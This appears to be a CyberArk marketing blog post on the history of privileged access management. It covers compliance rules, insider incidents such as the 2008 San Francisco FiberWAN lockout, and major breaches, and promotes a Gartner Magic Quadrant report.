Regulators understood that privileged accounts gave too much power to individual users over networks and data to not be accounted for. Corporate accountability would require an audit trail of who had access to privileged accounts, how they were being used and what they provided access to.

The introduction of the Sarbanes-Oxley Act (SOX) marked one of the first times that securing privileged accounts became critical to achieving compliance, quickly followed suit by regulations like HIPAA, PCI and more.

As the pioneer and a market leader, CyberArk has guided the evolution of privileged access management. CyberArk was the first software vendor to make it easy for organizations to identify, control and audit access to privileged accounts as part of their compliance programs.

Abused privileged access in the spotlight

One of the first major incidents that demonstrated the power of privileged access happened in the summer of 2008, when the city of San Francisco lost control over its FiberWAN network. Terry Childs, the city’s systems administrator, locked access to the network by resetting administrative passwords to its switches and routers.

This event was a high-profile example of the threat of privileged insiders, and begged the question what would happen if an outside attacker gained this level of control over a network?

The ensuing years gave us an answer from Edward Snowden, to Yahoo! and the U.S. Office of Personnel Management, to the Bangladesh Bank and Uber breaches the common denominator was that attackers exploited the access typically granted to a powerful insider and used it to launch and execute their attacks.

Privileged access management as we know it today

Today, privileged credentials exist everywhere. The adoption of cloud, DevOps, robotic process automation and more has dramatically expanded the threat landscape. Attackers know this as well, which is why nearly 100% of all advanced attacks today rely on the exploitation of privileged credentials to reach a target’s most sensitive data, applications and infrastructure.

This is also why privileged account management is now recognized by Gartner as the number one security project for CISOs out of the company’s top security projects for 2018. **

CyberArk leads the market with its focus on simplicity, automation and risk reduction, delivering the most complete solution on the market to protect against external attackers and malicious insiders exploiting privileged credentials and secrets anywhere they exist including across on-premises, hybrid cloud and DevOps environments, and on the endpoint.

To download a complimentary copy of the Gartner Magic Quadrant for Privileged Access Management, go here (registration required) .

* Gartner, Magic Quadrant for Privileged Access Management, Felix Gaehtgens, Dale Gardner, Justin Taylor, Abhyuday Data, Michael Kelley, 3 December 2018

** Gartner, Smarter with Gartner, Gartner Top 10 Security Projects for 2018, June 6, 2018

Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, express or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.

Download CyberArk’s infographic “The Evolution of Privileged Access” below:

Report: Pioneering Privileged Access Management
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